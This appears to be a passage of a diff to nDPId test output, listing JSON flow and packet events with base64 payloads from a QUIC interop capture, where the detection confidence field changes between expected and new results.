00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434519,"flow_last_seen":1603816434519,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434519,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1603816434519,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434519,"pkt":"pJGxgjQ5PKn0qB\/sht1gBLPeBNgRQCABCwcKydWupNP+R2kegH0gAQvIR6QcJQAAAAAAAAAB67oBuwTYAdrFCgoKCgjhAy9VFSPmbQAARL7A303oZAFgGrTdGfei\/mHvqz29qgHXvt1vCJg2pc8FQKC36WDnBuPNUSWLIPLEGFVHDdTlHgEU8JaXOv5IcEJ6NZixRK+p1qGiKw+JPZoJHLOP3KMbB5ngi1RcHFIqjWkGqrO6Il1aIL5lyoE01q8y31quARUppPZlbh9u8WyKOZncFcG5VSpCu3UE+cTCqpGjHOnXC\/1HVlcF0rPYeaHUMOcvFeS7y7V49OnzF7ttNLuTcyzNKgrnqbXVeEFjqLCnQqFji\/PE8S791D2YivE\/b7eIwJzHPMOZxla3AUW1ggsh\/8zQVMk7TQ77ZAmxg7c56Ykrcym6mqal+6TN6kIdyk1r8ujmnBp2XTNKpRpO15gBPf\/xmmYsn0LfjAGybSTVfzGe+r9+hhk9FRKWlvSa0mUhD5xcSPxL855ekaVs8es5YbbQJzvgyO0E6jlhqBvBuXAFk7V5bJfYUhuvK7+FV\/vqBa5Dyr1Y4aVAg8uqmcbLqzdH2nG4UUlIo5QS\/5YbcbMVH8iRLcVUqSgPI65pQT1eOh5NtpZaGNEaXfSjJtIcZtks1c9UmuF5RZk5R8RQDxMBmTUIHRWRrWAtXGorI1rYK3OSEHdlNwZLgl\/WhBsg8pHYuSYaJpYetojCp9wSrshudt2xxyszjnmuhkGDIm7Y\/wjwl1afYHDK3hktBEZRnZVWPJaRHBs4awP9h7+ogQbF1JHMgqJ8UHjilyfki+6fs4+HR4\/6MD0nR2lO00THBaPUZEBIBanL39bTcfHJv9V2bghWT79XrP3UcYoKelpB\/ItWidO0yq9fm+CHlz9Et4Ou\/1QyXDWEp+CTMyrOG3vgDdsY85\/lqem3Pk\/TK14Hvru6JNyjBX1qQfwbZ88ltbaToG0yqFOgs2W5Arx9\/dI4Ztfqsjc+585hIsoYnSoLWOXcSri0SP6dHTiXrSLkzfw516ezxXVHyVqjVj05mTnGg6pkVppsXFLKXFlWA1e1ekM\/7pIK3mEFd1m5zAsBvdRI8t0eAjdE\/YqRjTOBuVa2i4QrjzAhkilSHIU4wsKR0bJYrKvlvC6aSvyiIhDJ8TTHnME5NeWT+7GBlVwsE5DxirVv\/piW3kABvaCjRWG\/FT17E9VSZ46Bt\/YDK2K++WfWexMUmiclj\/iNE0u\/2Uu2FqhLdisuC4yPh1npFfTyVb5gd0sFzCfXeCse35OuC0BYyIPm6NlvuaZqtz3phwQTaixo2zFFiJEmFvvuAA7ELwFzzKc41TRB1+kry45l3KOpElwYbMgfd36GZXpWYtuP6E52jGg5RtuhyBlrf788aBNf8sLkyM9xE9KcxBb5QVeJTjT+LcWZdWa+v3KGsrLCPyrX+kiGauCjQ+hs82UiUqVf9Rz3JFbGEwZgYlj7I14qfs\/YcVCcwnxGzpddMNKdr0ra2x1StoIrJ0raVEvvwlSDr+tCYZpUpOYxl90g6gsdiN7MJw2E9wvBWEpyPi
juZ0KwxzCd0EAOuXWQRRPgW+xa5IDUzZpOTbVEZnGiINxr7hy0M4cxGp7iAIcmRBu08GCRc89HtXVlh4Lj0ClSbZKBKbo7me+xDowYARa7U5sl5\/iHaXVCKJtSB5\/MjfywY1OM6Rrb\/rUovA=="} -00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434519,"flow_last_seen":1603816434519,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434519,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434519,"flow_last_seen":1603816434519,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434519,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434523,"flow_last_seen":1603816434523,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1603816434523,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434523,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUASTxAAEARQtzAqAGAKHC\/PLXwEVEE7Eu5ywoKCgoIUh1YuhDqcyAAAETShcZ7U61m3r3pKDSZMAlRkEkMX8IBatc2KSsG3VEj0lAsPYd+5xEo7F0R6rRII91EQq3kY6fRBVYjgUzkelUep6PIw4v1uOUHWVWj9\/CBoCuFmh0QBFTlwFV3ajZYJtEVj\/UMbkT8ggH6NbKSJV7\/7XCOY6sOXc7KO1y3bpcq5D78RQTF3QAnMEYSTjEkBHANDD5W9AIyB1dmHqwExvOJV7YrCF0Wz7pCUTi8XP9KFNvgkhOSPVQjF1KeCLRKAL3ZHtPolipZhKCqRtuCyeyoz\/WKMUWuH2pOJ\/WCN+fIaYqYSu2\/Uw9h6SGQoS6DN0anGtpDnUD0GFob1uYgJfvGsEIlEF4ovhbxwTVp7mrf8Jn1RwQU6cEaGVAGxcwFRF59HEd7DfQ2HqiN6ygOPpQYa4cx7qpW5pucG8spbD1\/cWsvhbhGqD8WXrUrT5FX8eR51cu5\/rSEZZ0hJlrQrcyu1Jo+wtEU248WCYzmcFDU3KkwLTXrWInL3I4\/3lLpKWAzyz04l7KeGoqcwCeKKQ6p1uyWxpMWebh\/pAeZzwZIk8uY57nKlrPOmivZENHW9oA7\/VrJHghXWWSPNWv94zdJtPbS4kaRkkyKA6YWscg88+FeMvb1pCnByg\/FBd8Mkh8FAhvUPdRBKBqvfa6hdS6kOEBzLUDEht1P\/hkx2oxe0tO1cCFKrfKPAgjP7fDs+HjYwYUjQcQs0Lrfeiezhk68WlVN7f3ydw4AyGklyENZMzjbp2KCDTQJw+bwFV8oeqGfVQRe12vWjCN19ZIAet6\/7N00iAsSHL0OYmwIy5kEm9ia7W54BjwDLqYTIVS2lLjOBW8eRTghxgSgQxvjGDeszyBcMdQvXcIFvNEPXDZvspUbePIw91S9T7A3jCp65i7X4r+fn3M7N5F7j5
8fappJzU95USbFKUMdxds5siewsczbT\/MrC2OkG0+JuLsutjVwruC3oxgf0F68j+vl1Wm0rJIMkpipHqVvhcHhV+OWaqezJa4AMHRf7fdSrYwPxKtdQTJG3\/g7anjqxa6WSX99h5LjVhbxHDD361DVddXanfGMVBhF7hsyy9ONqBFaE0X3vq+HEhBWkG9LtGG68wwwE5NwZds\/5HESH+ia5Ow\/sbVAD5094mw+zs9a70KyvM0z2kZ8P5B1wNaZ7JZ67KSZOdP\/DCz7bP9r0i+DKzjU4mo1fhcDYTbnyYL09iH+yrFC4uLIRq1vlDgFJ2X2xDITqMN6kx\/ZziHpUw0+tusqXNSXNMQMFKUZKnReB3GpZaA4xILTO73fVG7kLqQ2j9Pfhgr0XjkpujIdWgbDJPwVi0egmLmvkiBx2oWjN0pYUqFfvKMLMSROetLN33mIJ7WaM6DIBHm0ZoNLBntXqK2QERM+5VXgRG\/zKfBTkTfngbP7Dw38e4JcE1olS6CghzCOQzrj\/EPi9cO\/THKUsaoFe7VwubEl6zVajKWO\/ftqXQDEtcPyWqS1x9VkXgf+5HCH6y4ZfXz8j0oj\/gEliPbSFZd61V\/W+k+69wJ4Ve8CztvjyEeitwZuhoIUutC7Co\/agYewJuOHM9M9SEui8BMgVWEjqOMxUGgxy\/aNH+S0wwqZxbtmcgxtt\/+dU8H1VYtjo5PU7ihOGqkqbFa6tDbR7MCwkw=="} -00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434523,"flow_last_seen":1603816434523,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434523,"flow_last_seen":1603816434523,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434524,"flow_last_seen":1603816434524,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434524,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1603816434524,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434524,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAgmJAAEARCbbAqAGAKHC\/PLT+AbsE7KwIwQoKCgoIe34skUb\/aLsAAETSb8uSUd6EB7gNq4gf6KDxkhY+y87q3CLci6x1EsNvv80WGJPIpKwhzC8+vg4NXuO4unafv2NMJkJjRI6OL98YRtdvYGXB+F3JwCowCuwGqw6jTxikMXRPpRCAgRKO5X\/KxcEwJRdTBT2rlOzU+hO0yWkEtT4rCwTG1V9X6PEAkb8zWYSIsTTFWdbuo8+Hsr3EHPqfyeXbsSzOoMiqiG28CC1UB7fjZJ0W3T0asAlOYWGl8MIKuqHYSMDCaz5\/KR7GxLTjjCeuvA71YVTfkU0Gf1f4xW0HKl3ycj89fZPIImHw1dOmlLMZdNJPHN3oMEV1WzgH15lz2HPaXv7a5Th+I9CCo7LropS0BbFADYctmnMsqGggv3K7uKbyNnulVBXm7b\/tIGeDPKbxhMVyVFX\/OFstaFoYOfWt41Qv0Uz+5xguURoeuY7TUkuJQ2TlXG1IxX6EbnM98toW72ernv2vm8GcA06P94MCodt6GnFnJdalXwd3Z0Zgu8r3434Yhg444uk2HEryaQG3hHsq9RRP13JfK3yZ+q3HWXP97pXxl06amatIARReotx2af2MAxWD4J\/9LErkYyTqlEr6EnBC+7r1cV9IP3w6nfwYEb0VMSsQMzOKiqBofCNQtvNgMmkH5GMWZlDP0T3k9d+0l3FMevNqVwb+iznRosmDKbOnAOsNl2nNjXZYQXWhQqAThjmx79k1nVXVH\/HuAezLxegqma45cG67rPyGRqN3q1h5El6PYgtdZyE5yz+oVR6XOIkyz168X\/Rv7t73N+i0n+IFHPvHuQ+EK3e1BGUIifpyEElK5RsbL4HGjtaWcevK45MDQ3axvbDUEW\/w2lJrfPlXa\/XZ94sTcZvgd9dy1K9MAJdUT1E0ufvAhjda4LLkNYkdVZjhePaG\/OIP0+\/2yjL6i\/866d9NM8o49WaX\/O9Pd296qB4TZaRNaKuBx+CTsP+biUuW\/9YibPEOQBdFkjBprbbH1nXMOpEF6QqyTSSWy1mOqWI7NTc8ioxMC\/07KPAh6S5NvmgDw9rb7lm4u9afeFEO\/2Y2F04NKOOTYQjedcDqmY1izosf6wgBTRlHezP6uNhrQcmJzYaSn3Fg99mguDGzeymhTX46iCjpPSI\/wUScS13iOhxccWK+52NCIsSS1ArhMq7x5GIHJngmyLap8JYRZLzZek50uDc+cvlWv5aWpLq4oeFbzb2UpThvb0S8TbvXwHNE0GcN9NQ47Cz0xMuSlHF7VEKoW\/ldk\/T1mzEivHu6X4HhGg8NuDcJj6aZIVaJae1NxSt5gLl8MTFDp8u0m2DXTpjwFCV3AX\/hN8OLAAu3WZ+A6sHLc1Laby2OYoClrb6PAbfK8O93b7DnY1GdxskJ1zN2DGmXMfzpZYEvO6KwGvo9tWt5MopqXQ2LZWUoyLrLoGDkaMoRzTKI\/QFULy6GKZQuGdZK8BHoqiDwJoTG\/iTyF1KYSQbibwt0sOyty8uw9tMbzTSnr+UrS3c6KjbJG3G
NT+Hel2hrgKBCTL1FLUatdsWvxb3xr1uQGvayWgC4e8BQxZ9J4DVcI4Jl9RFSGru0ncBQHVlkznYPLGR5hwEuTrIrbhESI0fIBtr8gRxzc5NuTahe+uchbMgzGi7qkmDsOQtGYpMw30QbIQ=="} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434524,"flow_last_seen":1603816434524,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434524,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434524,"flow_last_seen":1603816434524,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434524,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434528,"flow_last_seen":1603816434528,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434528,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1603816434528,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434528,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA5QJAAEAR53bAqAGAyu7cXJXeEVEE7LxswgoKCgoIN5KvB9nft6kAAETSHGVijjeaIj19wFPg1eU29TK6pHOMAuBm7PlkQXCoUAkcIsjKIox6Tem8bVN8W3P7l09wyVGafUKmNhonG2+PLUPwJedoIYbfaArvK\/RuwZUPJBHiPqclPj8GB4blfNLZCSxE7O80ZWg6IzmaH0ZyK96aL8u3DeLpkwvE+ZiYmPNHLkxCubDvJZKErdDSCNct\/8C0DNjLgLDA2edu7gd5la5GmHjIWyqKCsVDNCJZblHcVBL1VdA06pyamhaIutlHrJtt4MwRHnHaWsi4xtJmIF21kHBkIHdSNDwPpZdZQOo6t6Itpq1ZTpS7VN39q1L5s9axaQwh1msQpQnvxEMKRTjphoLon2C14B0FHuQO+nIydxdhsWr7CdUuXtsSSSuwWO4Ld68XCiQx9y1eBiBAB+GD2Wu\/lb9XwLxv5IssYnU4s6tBvuesFaIcboSu0qDauY6CaPlOVzIvtAJYMstwHjBjgOUg1VLVbW4e8RABqYyrAFgk1Y\/+PtHf\/PYsvCZhOCB5kqbImiRw3h1pD67YavEoB32fyii0nqrXhuOx80OsYd19rZfvwepXx7rsTO7Azrv1gfJUNVyN3GZFPVbu+9bah0bZVb2faEbPsXvHVJ7ADhVuYKBowG3\/vToH88gOsc5MmMiA7BPkeocUuJbep7qVkWVyD6A4XDSMgQOf4snKf3NMnwoOZ5+\/oEP35GdTw+gaNQtPml2DoGyADmvPE2GySCNdXh6kRDEzP1eIDWJ6cblFsWZLk3HJxSVWVK4L5nGv7G236HRvH7cao3OofLUezX5EJcTnlNBjPkG2QPEEcNrUyzgTzeskCKdHWBppAIz5V7d5Rm9KbgwRKyHgP52XfTCa9HE6G\/aWYw8rvnpb3BVO7AuVUTIl+JadVGBMO6HP9MQda7QUWFv6
MTUs4VpAGaDAJWfobOxRrmQWeu9NDR0bYEXNNAf7RSIcYCgEjVOU9A87EHcp5jWmc9mASoXlXUjhMutb4712Z6btK9v5ePztTnZNKvllfQgWfQ0YcDu+IovA\/LzcmwpJeiamvlR4aeRi4IENGOnyfwZ+m2LklN5Vs3C\/uAPp9drDmngkL4hb+R4z1IEA0ohBJXoQ+GkgXZ77qbe6ISLXHCPXiKNO4b82HpsRurSda+ao+RM0sD0EiMBh\/TCkxcIcAIltsz8QoSaYF1MGi8GOXIhmTX1jWZrLAHyJmPKC9EuNW9neoG9EJZ+dIX5mFx0oGGaw2sdFPwhkPFTtqOk5AWokoPIwvT5vd4Sa519tHm6athzsvpY\/qhpMhYMBhIn+Ia+ZLRy9h52056DhP7uVx2GyT9ovjnsPolXuMkxrgw2OIdEvaKHwHSLmDh1euVdBDmyBUwspPiAOjuWMEDE13npg368409PBTQTw048QeZ\/V36AB8RGBYvtIGfzBKjh7cAm8l7WE9s5UvaZQy873oVec7lmimiZyEb5LyxRSzZWjXpzMqWJZuYCs9SpKSXnfZSSdiAHAKhypk11NUGFwk3vS\/I5fWfsFxUM+Rlf7z6obYtc9UnzwhZEp+DuRwFp0SSRdY9xJC2al7618o0Fetdd+n5VB8cJhD79oCRxpjuJClhZScv8yRHXQ2tWyL8V5prewYS8GgYGe0z2ZOFSP2ZvQeX70ng=="} -00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434528,"flow_last_seen":1603816434528,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434528,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434528,"flow_last_seen":1603816434528,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434528,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434530,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 
01188{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1603816434530,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434530,"pkt":"PKn0qB\/spJGxgjQ5CABFwAJA69kAACYB7ksDefI2wKgBgAMDt3gAAAAARQAFALRdQAAhEei3wKgBgAN58ja3ogG7BOzsKsYKCgoKCHUJ14NKwS2PAABE0nUjXqgo3Pq+h\/Bzi9p31\/TZeG7dv7XIf5N1hruOb+rMEEShGYweXC+T8EETUns4xE1pcJfcd9QxJWLz4mk48BM1d7sz6D0g90Q7A6DSDnSX8zPHnk\/mBfB7WcT8ZfCXzHAFhGGnFcwiEQYipESmQ6UeXUdKLkbZVdxhnu5LdA7U8ofrC97xC4VdpB8+pct9Ef44k+OzR1LZByriJ678sYxqlbwGB9+J+7VwgUOg\/gH2R9dX6bQQUO7rTCoyUHrYGZ5osp+I31JLOOQ0C6bZs5jO72nIFTNVF37w0TIl1hS5YHNmjLHkXmrNxza9D1NWHtYItabi0jdmvYKXEW\/jtGDBbNI5Spt\/DdSwahkwacog7vEBAslclMpeaBEdIll7ht0275DdkEE5wCpSaptHi1ZfzWLt8\/3zVoN9gllA09tedp3dfnrCs3MbxDshoV7lFoWGdn\/dNMr60Cx3AUMtm2P3NvJ\/wl+FPKcSOjciGrJox3eMTCqBEuAzJo0ymq8aqrjO3V0G12SwfBJ9tJCn3UEWBx4Pq3qlqktq2\/Fy+CDEiIPPlLGrnjA5s631GXf+eke3F40ZavlVJrfNauZzZygjAUP+676+Kjhjmdgh5vVfrgA0zW4b73tJevIq4He558UKRJU4CMox8hYb3fCj6C3dh7FjwxE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434530,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.594034} 
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434530,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.594034} 